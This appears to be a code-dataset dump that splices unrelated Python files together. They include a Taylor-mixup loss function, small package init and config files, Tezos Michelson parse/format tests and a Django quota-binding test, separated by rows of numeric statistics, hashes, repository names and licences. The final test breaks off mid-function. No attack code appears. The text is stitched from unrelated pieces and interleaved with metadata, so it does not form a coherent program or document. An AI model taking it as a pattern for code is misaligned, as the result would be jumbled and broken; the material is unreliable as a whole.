def taylor_loss_de(images, labels, model, mu_img, mu_y, Uxx, Sxx, Vxx, Uxy, Sxy, Vxy, T_U, T_S, T_V):
    """Epsilon-delta "cross-term" regularizer of the Taylor mixup loss.

    Returns var_half_mixup * (data-dependent mixed-Hessian quadratic)
    + gamma_squared * (data-independent part reconstructed from the
    truncated SVD (Uxy, Sxy, Vxy) of the input/label cross-covariance).
    Arguments are as in taylor_loss; the Uxx/Sxx/Vxx and T_* inputs are
    unused here but kept so all taylor_loss_* variants share one signature.
    NOTE(review): assumes CUDA is available (.cuda() on new tensors).

    CLEANUP: removed dead locals (an unused return_dict / component list
    and an immediately-shadowed num_components); behavior unchanged.
    """
    # extract batch size and number of pixels per flattened image
    N = images.shape[0]
    img_size = int(images.numel() / N)
    # original (non-flattened) batch shape, needed to feed the model
    batch_shape = images.shape
    images_flat = images.reshape((N, img_size))
    mu_img_flat = mu_img.reshape((1, img_size))
    num_classes = labels.max() + 1
    # Y is a stack of rows, one-hot encoding of the correct labels
    Y = torch.zeros((N, num_classes)).cuda()
    Y[np.arange(N), labels] = 1
    # we assume uniform distribution, so theta_bar = 3/4
    theta_bar = 0.75*torch.ones((1)).cuda()
    # mean-mixed inputs and labels over the whole batch
    Xt = (1 - theta_bar)*mu_img_flat + theta_bar*images_flat
    Yt = (1 - theta_bar)*mu_y + theta_bar*Y
    # input/label deviations from the mean, held constant w.r.t. autograd
    V = (images_flat - mu_img_flat).detach().clone()
    W = (Y - mu_y).detach().clone()
    # variance of the Uniform mixing weight over an interval of width 1/2
    var_half_mixup = 0.5**2 / 12
    gamma_squared = var_half_mixup + (1 - theta_bar)**2
    # data-dependent component of the inner product
    data_dependent_cross = hess_quadratic(
        lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'y', V, W)
    # data-independent component, reconstructed one singular triplet at a time
    num_components = Sxy.numel()
    data_independent_cross = torch.zeros((1)).cuda()
    for i in range(num_components):
        data_independent_cross += hess_svd(
            lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'y', Sxy[i]*Uxy[:,i].reshape((1, img_size)), Vxy[:,i].reshape((1, num_classes)))
    return var_half_mixup*data_dependent_cross + gamma_squared * data_independent_cross
# returns regularization (non-loss) terms
def taylor_loss_d2e(images, labels, model, mu_img, mu_y, Uxx, Sxx, Vxx, Uxy, Sxy, Vxy, T_U, T_S, T_V):
    """Epsilon-delta-delta ("3-term") regularizer of the Taylor mixup loss,
    reported cumulatively at several SVD truncation levels.

    Returns a dict mapping component count k (those of [1, 2, 5, 20, 50,
    200] not exceeding T_S[0,:].numel()) to -0.5 * (1-theta_bar)^3 times
    the cumulative hess_svd_ed2 inner product summed over classes and the
    top-k components of the per-class T-matrix SVDs (T_U, T_S, T_V).
    Arguments are as in taylor_loss; mu_y and the Uxx/Sxx/Vxx, Uxy/Sxy/Vxy
    inputs are unused here but kept so all variants share one signature.
    NOTE(review): assumes CUDA is available (.cuda() on new tensors).

    CLEANUP: removed dead locals (unused one-hot/mixed-label tensors,
    unused V / var_half_mixup / gamma_squared, and an immediately-shadowed
    num_components); behavior unchanged.
    """
    # extract batch size and number of pixels per flattened image
    N = images.shape[0]
    img_size = int(images.numel() / N)
    # original (non-flattened) batch shape, needed to feed the model
    batch_shape = images.shape
    images_flat = images.reshape((N, img_size))
    mu_img_flat = mu_img.reshape((1, img_size))
    num_classes = labels.max() + 1
    # we assume uniform distribution, so theta_bar = 3/4
    theta_bar = 0.75*torch.ones((1)).cuda()
    # mean-mixed inputs over the whole batch (this term only needs Xt)
    Xt = (1 - theta_bar)*mu_img_flat + theta_bar*images_flat
    # number of components kept from the per-class T-matrix SVDs
    num_components = T_S[0,:].numel()
    return_dict = {}
    # truncation levels at which a cumulative snapshot is recorded
    num_comps_to_compute = [1, 2, 5, 20, 50, 200]
    hess_quad_innerprod = torch.zeros((1)).cuda()
    # components in the outer loop so each snapshot covers all classes
    for j in range(num_components):
        # sum over classes
        for i in range(num_classes):
            hess_quad_innerprod += hess_svd_ed2(
                i, model, batch_shape, Xt, Xt, 'x', 'x', T_S[i, j]*T_U[i, :, j].reshape((1, img_size)), T_V[i,:,j].reshape((1, img_size)))
        # snapshot the cumulative term after the (j+1)-th component
        if j+1 in num_comps_to_compute:
            return_dict[j+1] = -0.5 * ((1-theta_bar)**3) * hess_quad_innerprod
    return return_dict
| 36.07078
| 167
| 0.660579
| 3,197
| 19,875
| 3.961526
| 0.108539
| 0.020213
| 0.021477
| 0.017766
| 0.758626
| 0.75152
| 0.736992
| 0.733044
| 0.711488
| 0.676352
| 0
| 0.018364
| 0.221887
| 19,875
| 551
| 168
| 36.07078
| 0.800582
| 0.37912
| 0
| 0.767932
| 0
| 0
| 0.002303
| 0
| 0
| 0
| 0
| 0.001815
| 0.004219
| 1
| 0.050633
| false
| 0
| 0.012658
| 0
| 0.113924
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
bedf33b41e91389e1709d0e3f79f3bfae03ddea1
| 259
|
py
|
Python
|
cakechat/utils/offense_detector/config.py
|
timmoti/cakechat
|
97f14e3f12c92edb30ed385fe93e7e3944bcd298
|
[
"Apache-2.0"
] | 1
|
2018-05-15T09:18:19.000Z
|
2018-05-15T09:18:19.000Z
|
cakechat/utils/offense_detector/config.py
|
hooram/cakechat
|
92b0957329738b9480f36f62d63876ed758208c5
|
[
"Apache-2.0"
] | 64
|
2019-07-05T06:06:43.000Z
|
2021-08-02T05:22:31.000Z
|
cakechat/utils/offense_detector/config.py
|
timmoti/cakechat
|
97f14e3f12c92edb30ed385fe93e7e3944bcd298
|
[
"Apache-2.0"
] | 1
|
2018-10-14T04:14:41.000Z
|
2018-10-14T04:14:41.000Z
|
import os
import pkg_resources
import cakechat.utils.offense_detector
OFFENSIVE_PHRASES_PATH = pkg_resources.resource_filename(cakechat.utils.offense_detector.__name__,
'/data/offensive_phrases.csv')
| 32.375
| 98
| 0.675676
| 26
| 259
| 6.269231
| 0.615385
| 0.147239
| 0.245399
| 0.343558
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266409
| 259
| 7
| 99
| 37
| 0.857895
| 0
| 0
| 0
| 0
| 0
| 0.104247
| 0.104247
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bef78df01329d22337eafd0938c56e0973260729
| 283
|
py
|
Python
|
utils/kubernetes/__init__.py
|
StackVista/sts-agent
|
f8358ea46820ffb9eb0b4b30c7d7457cc2cc987a
|
[
"BSD-3-Clause"
] | 4
|
2017-03-18T12:16:40.000Z
|
2020-11-12T06:59:29.000Z
|
utils/kubernetes/__init__.py
|
StackVista/sts-agent
|
f8358ea46820ffb9eb0b4b30c7d7457cc2cc987a
|
[
"BSD-3-Clause"
] | 18
|
2016-09-22T08:01:02.000Z
|
2020-07-15T08:30:17.000Z
|
utils/kubernetes/__init__.py
|
StackVista/sts-agent
|
f8358ea46820ffb9eb0b4b30c7d7457cc2cc987a
|
[
"BSD-3-Clause"
] | 8
|
2016-11-23T06:55:51.000Z
|
2021-07-05T05:12:34.000Z
|
from .leader_elector import LeaderElector # noqa: F401
from .kube_event_retriever import KubeEventRetriever # noqa: F401
from .pod_service_mapper import PodServiceMapper # noqa: F401
from .kubeutil import detect_is_k8s # noqa: F401
from .kubeutil import KubeUtil # noqa: F401
| 40.428571
| 66
| 0.798587
| 37
| 283
| 5.918919
| 0.513514
| 0.182648
| 0.219178
| 0.182648
| 0.237443
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06639
| 0.14841
| 283
| 6
| 67
| 47.166667
| 0.842324
| 0.190813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
befcf7d54065c34019a35095a58f037c15ecc9ef
| 9,443
|
py
|
Python
|
tests/contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/test_michelson_coding_KT1Gqy.py
|
juztin/pytezos-1
|
7e608ff599d934bdcf129e47db43dbdb8fef9027
|
[
"MIT"
] | 1
|
2020-08-11T02:31:24.000Z
|
2020-08-11T02:31:24.000Z
|
tests/contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/test_michelson_coding_KT1Gqy.py
|
juztin/pytezos-1
|
7e608ff599d934bdcf129e47db43dbdb8fef9027
|
[
"MIT"
] | 1
|
2020-12-30T16:44:56.000Z
|
2020-12-30T16:44:56.000Z
|
tests/contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/test_michelson_coding_KT1Gqy.py
|
juztin/pytezos-1
|
7e608ff599d934bdcf129e47db43dbdb8fef9027
|
[
"MIT"
] | 1
|
2022-03-20T19:01:00.000Z
|
2022-03-20T19:01:00.000Z
|
from unittest import TestCase
from tests import get_data
from pytezos.michelson.micheline import michelson_to_micheline
from pytezos.michelson.formatter import micheline_to_michelson
class MichelsonCodingTestKT1Gqy(TestCase):
def setUp(self):
self.maxDiff = None
def test_michelson_parse_code_KT1Gqy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/code_KT1Gqy.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/code_KT1Gqy.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_code_KT1Gqy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/code_KT1Gqy.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/code_KT1Gqy.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_code_KT1Gqy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/code_KT1Gqy.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_storage_KT1Gqy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/storage_KT1Gqy.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/storage_KT1Gqy.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_storage_KT1Gqy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/storage_KT1Gqy.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/storage_KT1Gqy.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_storage_KT1Gqy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/storage_KT1Gqy.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_parameter_op1vDy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_op1vDy.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_op1vDy.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_parameter_op1vDy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_op1vDy.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_op1vDy.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_parameter_op1vDy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_op1vDy.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_parameter_ooqAps(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooqAps.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooqAps.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_parameter_ooqAps(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooqAps.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooqAps.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_parameter_ooqAps(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooqAps.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_parameter_onu43U(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_onu43U.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_onu43U.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_parameter_onu43U(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_onu43U.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_onu43U.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_parameter_onu43U(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_onu43U.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_parameter_oo6Wkn(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_oo6Wkn.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_oo6Wkn.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_parameter_oo6Wkn(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_oo6Wkn.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_oo6Wkn.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_parameter_oo6Wkn(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_oo6Wkn.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_parameter_ooHqAk(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooHqAk.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooHqAk.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_parameter_ooHqAk(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooHqAk.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooHqAk.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_parameter_ooHqAk(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooHqAk.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_parameter_ooU8MM(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooU8MM.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooU8MM.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_parameter_ooU8MM(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooU8MM.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooU8MM.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_parameter_ooU8MM(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooU8MM.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_parameter_ooBcbW(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooBcbW.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooBcbW.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_parameter_ooBcbW(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooBcbW.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooBcbW.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_parameter_ooBcbW(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooBcbW.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
| 46.9801
| 90
| 0.733983
| 880
| 9,443
| 7.563636
| 0.05
| 0.048377
| 0.074369
| 0.135216
| 0.963341
| 0.963341
| 0.963341
| 0.963341
| 0.947416
| 0.947416
| 0
| 0.031037
| 0.191359
| 9,443
| 200
| 91
| 47.215
| 0.840623
| 0
| 0
| 0.639053
| 0
| 0
| 0.316531
| 0.316531
| 0
| 0
| 0
| 0
| 0.159763
| 1
| 0.16568
| false
| 0
| 0.023669
| 0
| 0.195266
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
831962ebd3fea680260d545014e6784b1cba6901
| 26
|
py
|
Python
|
terrascript/vault/__init__.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/vault/__init__.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/vault/__init__.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | 1
|
2018-11-15T16:23:05.000Z
|
2018-11-15T16:23:05.000Z
|
"""2019-05-28 10:50:46"""
| 13
| 25
| 0.538462
| 6
| 26
| 2.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.583333
| 0.076923
| 26
| 1
| 26
| 26
| 0
| 0.730769
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
831b15f3b3c6e6a289776af8ddb4e57729a1076a
| 22
|
py
|
Python
|
ASTeditor/new.py
|
skylerberg/ASTeditor
|
55a2d3c53986174cb12e5269fff21c5e4fedf67c
|
[
"Apache-2.0"
] | 1
|
2020-05-16T02:59:32.000Z
|
2020-05-16T02:59:32.000Z
|
ASTeditor/new.py
|
skylerberg/ASTeditor
|
55a2d3c53986174cb12e5269fff21c5e4fedf67c
|
[
"Apache-2.0"
] | null | null | null |
ASTeditor/new.py
|
skylerberg/ASTeditor
|
55a2d3c53986174cb12e5269fff21c5e4fedf67c
|
[
"Apache-2.0"
] | null | null | null |
def new():
pass
| 4.4
| 10
| 0.454545
| 3
| 22
| 3.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.409091
| 22
| 4
| 11
| 5.5
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
832f51379b1095cd19da1da28f558558d4fa7d90
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/numpy/core/tests/test_custom_dtypes.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/numpy/core/tests/test_custom_dtypes.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/numpy/core/tests/test_custom_dtypes.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/25/db/ed/09935f2ff2ae669ac4e6d9d92111e650da1d08849833b05128e4394194
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.458333
| 0
| 96
| 1
| 96
| 96
| 0.4375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
83343a8bc9268d81d1649edf44e25372c0339b82
| 22
|
py
|
Python
|
vincent_crons/__init__.py
|
EVEprosper/vincent-lexicon
|
dad65564f7e1a3cc97af9f2ea9592025cb83df5c
|
[
"MIT"
] | null | null | null |
vincent_crons/__init__.py
|
EVEprosper/vincent-lexicon
|
dad65564f7e1a3cc97af9f2ea9592025cb83df5c
|
[
"MIT"
] | null | null | null |
vincent_crons/__init__.py
|
EVEprosper/vincent-lexicon
|
dad65564f7e1a3cc97af9f2ea9592025cb83df5c
|
[
"MIT"
] | null | null | null |
from . import GetNews
| 11
| 21
| 0.772727
| 3
| 22
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 22
| 1
| 22
| 22
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8353b4d77cc3f82f74b32d42e55870e0d315218c
| 42
|
py
|
Python
|
stixpy/timeseries/__init__.py
|
nicHoch/stixpy
|
cdb86094995590da36f3ae5e01f4ca4b9aac819c
|
[
"BSD-3-Clause"
] | 4
|
2021-07-06T14:42:09.000Z
|
2022-02-24T10:19:18.000Z
|
stixpy/timeseries/__init__.py
|
nicHoch/stixpy
|
cdb86094995590da36f3ae5e01f4ca4b9aac819c
|
[
"BSD-3-Clause"
] | 30
|
2020-10-02T20:24:28.000Z
|
2022-03-31T18:29:07.000Z
|
stixpy/timeseries/__init__.py
|
nicHoch/stixpy
|
cdb86094995590da36f3ae5e01f4ca4b9aac819c
|
[
"BSD-3-Clause"
] | 8
|
2021-04-16T11:00:13.000Z
|
2022-03-31T10:09:29.000Z
|
from stixpy.timeseries.quicklook import *
| 21
| 41
| 0.833333
| 5
| 42
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.921053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
360bed4d77495a28172ed474aa2d2803ac44844d
| 12,967
|
py
|
Python
|
tests/test_profile/test_quota/test_model.py
|
SyedMaseerulla/squest
|
d741a928f6361cf355607c2def31b0539592814b
|
[
"Apache-2.0"
] | null | null | null |
tests/test_profile/test_quota/test_model.py
|
SyedMaseerulla/squest
|
d741a928f6361cf355607c2def31b0539592814b
|
[
"Apache-2.0"
] | null | null | null |
tests/test_profile/test_quota/test_model.py
|
SyedMaseerulla/squest
|
d741a928f6361cf355607c2def31b0539592814b
|
[
"Apache-2.0"
] | 1
|
2022-03-24T03:37:12.000Z
|
2022-03-24T03:37:12.000Z
|
from unittest import mock
from profiles.models import BillingGroup, QuotaBinding, Quota
from resource_tracker.models import Resource, ResourceGroup
from service_catalog.models import Instance
from service_catalog.tasks import async_resource_attribute_quota_bindings_update_consumed, \
async_quota_bindings_update_consumed, async_quota_bindings_remove_instance, \
async_quota_bindings_add_instance, async_quota_bindings_add_resource, \
async_quota_bindings_remove_resource
from tests.test_profile.test_quota.base_test_quota import BaseTestQuota
class TestQuotaModel(BaseTestQuota):
def setUp(self):
super(TestQuotaModel, self).setUp()
def test_get_available(self):
self.quota_binding = self.test_billing_group.quota_bindings.first()
self.quota_binding.limit = 100
self.assertEqual(self.quota_binding.available, 100 - self.quota_binding.consumed)
def test_get_percentage(self):
self.quota_binding = self.test_billing_group.quota_bindings.first()
self.quota_binding.limit = 100
self.assertEqual(self.quota_binding.percentage, self.quota_binding.consumed)
def test_get_percentage_without_limit(self):
self.quota_binding = self.test_billing_group.quota_bindings.first()
self.quota_binding.limit = 0
self.assertEqual(self.quota_binding.percentage, None)
def _set_up_update_consumed(self):
self.billing_group = BillingGroup.objects.create(name='test_billing')
self.billing_group_2 = BillingGroup.objects.create(name='test_billing_2')
self.instance = Instance.objects.create(name='test_instance', billing_group=self.billing_group)
self.instance_2 = Instance.objects.create(name='test_instance_2', billing_group=self.billing_group)
self.instance_3 = Instance.objects.create(name='test_instance_3', billing_group=self.billing_group_2)
self.instance_4 = Instance.objects.create(name='test_instance_4')
self.resource_group = ResourceGroup.objects.create(name='test_rg')
self.attribute_definition = self.resource_group.add_attribute_definition('test_ad')
self.attribute_definition_2 = self.resource_group.add_attribute_definition('test_ad_2')
self.quota_attribute = Quota.objects.create(name='test_update')
self.quota_attribute.attribute_definitions.add(self.attribute_definition)
self.quota_binding = QuotaBinding.objects.create(billing_group=self.billing_group, quota=self.quota_attribute)
self.quota_binding_2 = QuotaBinding.objects.create(billing_group=self.billing_group_2,
quota=self.quota_attribute)
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 0)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
# Create attributes linked to billing group
self.resource = Resource.objects.create(name='test_update_1', resource_group=self.resource_group,
service_catalog_instance=self.instance)
self.resource.set_attribute(self.attribute_definition, 16)
